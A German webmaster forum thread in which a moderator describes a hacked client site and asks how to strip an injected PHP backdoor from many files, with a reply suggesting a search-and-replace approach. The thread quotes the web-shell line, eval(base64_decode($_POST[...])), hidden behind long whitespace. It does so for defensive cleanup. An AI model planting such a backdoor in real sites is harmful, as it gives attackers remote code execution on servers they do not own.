Es werden ausschließlich für die Funktion des Forums notwendige Cookies verwendet!

Unsere Datenschutzerklärung


Site gehackt
Ergebnis 1 bis 2 von 2

Thema: Site gehackt

  1. #1
    Super-Moderator Avatar von berny
    Registriert seit
    09.10.2010
    Beiträge
    617
    Blog-Einträge
    3
    Downloads
    65
    Uploads
    8

    Site gehackt

    Nach langen wieder mal ein Fall, wo ein Kunde gehackt wurde und ein Spamscript installiert wurde.
    Das Script wird unter anderem mit folgendem Code aufgerufen:
    PHP-Code:
    <?php                                                                                                                                                                                                                                                               eval(base64_decode($_POST['irgendeinestringcombi']));?>
    Und ja, die Leerzeichen sind deshalb da, weil damit der Befehl einfach aus dem Sichtbereich des Editors geschoben wird. (guter Trick, weil vermutlich der String nicht so leicht entdeckt wird.)
    Mit der Stringcombi (kann unterschiedlich sein) wird dann der eigentliche Code eingeschleust.

    Jetzt sind etliche Dateien modifiziert und ich suche eine einfache Möglichkeit, diesen php-Teil zu suchen und mit "" zu ersetzen.

    Ein Script zum suchen habe ich, jetzt brauche ich aber nur einen Regex-Befehl, diesen Teil incl der <? klammern zu löschen.
    Mit der vollen Zeile hätte ich es schon probiert, leider Fehlgeschlagen, weil es ja Dateien gibt, wo der eigentliche Code hinter dem ?> wieder anfängt und auch gelöscht wird...

    Ev hat jemand auf die Schnelle eine Idee.....
    PHP-Code:
    echo 'Clear File: ';
                                        $zeilen = file($c);
                                       
                                        $zeilen[0]= '<?php';
                                        $handle = fopen($dir.'/'.$c, 'wb');
                                        fwrite($handle, implode('', $zeilen));
                                        fclose($handle);
    Berny
    http://www.best-data.at
    Hier erfährt man fast alles über mich

  2. #2
    Administrator Avatar von KlausK
    Registriert seit
    29.09.2010
    Beiträge
    3.346
    Blog-Einträge
    1
    Downloads
    371
    Uploads
    539

    AW: Site gehackt

    Der Code wird sicher kein einfacher Zweizeiler.
    Du müsstest ja erst nach "base64_decode" suchen und ab dieser Fundstelle ($var1) den ausleitenden Tag "?>" ($var2) suchen.
    Dann $var1 bis $var2 mit "" ersetzen, oder wenn $var2 nicht da, dann $var1 bis Zeilenende mit "" ersetzen.
    Und dann die nächste Zeile(n), bis $var2 gefunden ist.
    Anschliessend gehts Rückwärts ab $var1 weiter, bis der einleitende Tag "<?php" gefunden ist.

    Mir ist das zu kompliziert. Da nehme ich lieber PSPad >> "Dateiübergreifend suchen und ersetzen" und lass mir alle betroffenen Dateien mit Fundzeile auflisten.
    Die kann ich ja dann von Hand bearbeiten. Sooo viele werden es ja nicht sein, oder!?
    Aber auch das automatische Ersetzen mit Platzhaltern müsste gehen: "<?php"[*]"base64_decode"[*]"?>" (Oder so ähnlich)

Ähnliche Themen

  1. Google SERPs Checker - Site Rank Checker
    Von Souldrinker im Forum SEO Tools
    Antworten: 3
    Letzter Beitrag: 07.10.2010, 22:53

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •